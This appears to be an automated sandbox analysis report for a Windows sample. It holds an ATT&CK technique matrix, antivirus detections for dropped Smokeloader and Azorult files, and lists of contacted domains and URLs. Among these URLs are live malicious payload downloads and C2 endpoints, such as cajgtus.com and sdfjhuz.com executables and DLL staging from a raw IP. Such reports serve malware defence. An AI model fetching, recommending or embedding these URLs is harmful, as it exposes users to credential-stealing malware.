Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	612 Process Injection	2 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Exploitation for Client Execution	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	46 System Information Discovery	Distributed Component Object Model	Input Capture	125 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	13 Command and Scripting Interpreter	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	1 File Deletion	LSA Secrets	1 Network Share Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 Scheduled Task/Job	RC Scripts	1 Services File Permissions Weakness	11 Masquerading	Cached Domain Credentials	591 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	241 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Services File Permissions Weakness	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	32%	ReversingLabs
file.exe	43%	Virustotal		Browse
file.exe	100%	Avira	HEUR/AGEN.1311176
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe	100%	Avira	TR/AD.MalwareCrypter.rddpg
C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	100%	Avira	TR/AD.MalwareCrypter.llbpm
C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	100%	Avira	TR/AD.MalwareCrypter.rddpg
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	100%	Avira	TR/AD.MalwareCrypter.llbpm
C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	100%	Avira	HEUR/AGEN.1311176
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	100%	Joe Sandbox ML
C:\ProgramData\EGIJEBGDAFHI\freebl3.dll	0%	ReversingLabs
C:\ProgramData\EGIJEBGDAFHI\mozglue.dll	0%	ReversingLabs
C:\ProgramData\EGIJEBGDAFHI\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\EGIJEBGDAFHI\nss3.dll	0%	ReversingLabs
C:\ProgramData\EGIJEBGDAFHI\softokn3.dll	0%	ReversingLabs
C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	81%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	87%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe	81%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	87%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	87%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Roaming\rujtcgu	32%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
safeautomationbd.com	4%	Virustotal	Browse
sdfjhuz.com	22%	Virustotal	Browse
cajgtus.com	23%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
transfer.adttemp.com.br	9%	Virustotal	Browse
nessotechbd.com	18%	Virustotal	Browse
trad-einmyus.com	17%	Virustotal	Browse
cdn.discordapp.com	0%	Virustotal	Browse
api.2ip.ua	6%	Virustotal	Browse
www.safeautomationbd.com	2%	Virustotal	Browse
api.msn.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://trade-inmyus.com/index.php	0%	URL Reputation	safe
https://aka.ms/odirmr	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://www.youtube.com	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	URL Reputation	safe
https://wns.windows.com/L	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	URL Reputation	safe
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	0%	URL Reputation	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://www.youtube.com/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.amazon.com/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.twitter.com/	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
http://www.openssl.org/support/faq.html	0%	URL Reputation	safe
https://65.109.242.59/softokn3.dllqd	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.json.	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	0%	Avira URL Cloud	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p	0%	URL Reputation	safe
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	0%	URL Reputation	safe
https://api.2ip.ua/geo.json)	0%	Avira URL Cloud	safe
https://65.109.242.59/freebl3.dll5d-	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://65.109.242.59/freebl3.dll/d	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.json.	3%	Virustotal		Browse
https://api.2ip.ua/geo.json)	3%	Virustotal		Browse
https://65.109.242.59/Z	0%	Avira URL Cloud	safe
https://powerpoint.office.comen	0%	Avira URL Cloud	safe
https://65.109.242.59/nss3.dll	0%	Avira URL Cloud	safe
http://cajgtus.com/files/1/build3.exe?	100%	Avira URL Cloud	malware
https://65.109.242.59/d	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/finance/crypto/	0%	Avira URL Cloud	safe
https://65.109.242.59/f	0%	Avira URL Cloud	safe
https://65.109.242.59/j	0%	Avira URL Cloud	safe
https://65.109.242.59/i	0%	Avira URL Cloud	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://api.2ip.ua/au	0%	Avira URL Cloud	safe
https://t.me/copterwin	0%	Avira URL Cloud	safe
http://www.reddit.com/	0%	Avira URL Cloud	safe
https://65.109.242.59/i	0%	Virustotal		Browse
https://65.109.242.59/s	0%	Avira URL Cloud	safe
https://65.109.242.59/r	0%	Avira URL Cloud	safe
http://cajgtus.com/test1/get.phpenh	0%	Avira URL Cloud	safe
https://65.109.242.59/j	0%	Virustotal		Browse
https://api.2ip.ua/geo.json-Agent:	0%	Avira URL Cloud	safe
https://t.me/copterwin	1%	Virustotal		Browse
https://65.109.242.59/:	0%	Avira URL Cloud	safe
https://65.109.242.59/d	6%	Virustotal		Browse
https://api.2ip.ua/geo.jsonY	0%	Avira URL Cloud	safe
https://65.109.242.59/r	6%	Virustotal		Browse
http://www.reddit.com/	0%	Virustotal		Browse
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.jsonR	0%	Avira URL Cloud	safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.jsonY	2%	Virustotal		Browse
https://65.109.242.59/:	0%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199689717899(J$-	0%	Avira URL Cloud	safe
http://sdfjhuz.com/dl/build2.exe$run	0%	Avira URL Cloud	safe
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://65.109.242.59/freebl3.dll	0%	Avira URL Cloud	safe
https://65.109.242.59/tography	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
http://sdfjhuz.com/dl/build2.exe$run	3%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199689717899	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?R	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.json-Agent:	3%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
safeautomationbd.com	103.174.152.66	true	true	4%, Virustotal, Browse	unknown
sdfjhuz.com	189.163.126.89	true	true	22%, Virustotal, Browse	unknown
cajgtus.com	213.172.74.157	true	true	23%, Virustotal, Browse	unknown
transfer.adttemp.com.br	104.196.109.209	true	false	9%, Virustotal, Browse	unknown
steamcommunity.com	104.102.42.29	true	true	0%, Virustotal, Browse	unknown
nessotechbd.com	192.185.16.114	true	true	18%, Virustotal, Browse	unknown
cdn.discordapp.com	162.159.134.233	true	true	0%, Virustotal, Browse	unknown
api.2ip.ua	188.114.96.3	true	false	6%, Virustotal, Browse	unknown
trad-einmyus.com	158.160.165.129	true	true	17%, Virustotal, Browse	unknown
www.safeautomationbd.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
api.msn.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://trade-inmyus.com/index.php	true	URL Reputation: safe	unknown
https://65.109.242.59/nss3.dll	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/freebl3.dll	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199689717899	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
http://91.92.253.69/wek.exe	true	Avira URL Cloud: safe	unknown
http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/softokn3.dllqd	build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV	build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.json.	E609.exe, 00000011.00000003.2086486753.000000000075E000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2085516872.0000000000765000.00000004.00000020.00020000.00000000.sdmp	true	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.gstatic.cn/recaptcha/	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/freebl3.dll5d-	build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.json)	E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/freebl3.dll/d	build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://powerpoint.office.comen	explorer.exe, 0000002A.00000003.2707064136.0000000008FE5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2710133432.0000000008FF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/Z	build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cajgtus.com/files/1/build3.exe?	E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://65.109.242.59/d	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/crypto/	explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/f	build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/j	build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/i	build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://s.ytimg.com;	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/au	E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/copterwin	build2.exe, 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.reddit.com/	E609.exe, 0000000F.00000003.2126709109.0000000009840000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/s	build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/r	build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cajgtus.com/test1/get.phpenh	E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.json-Agent:	E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1692249717.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/:	build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonY	E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
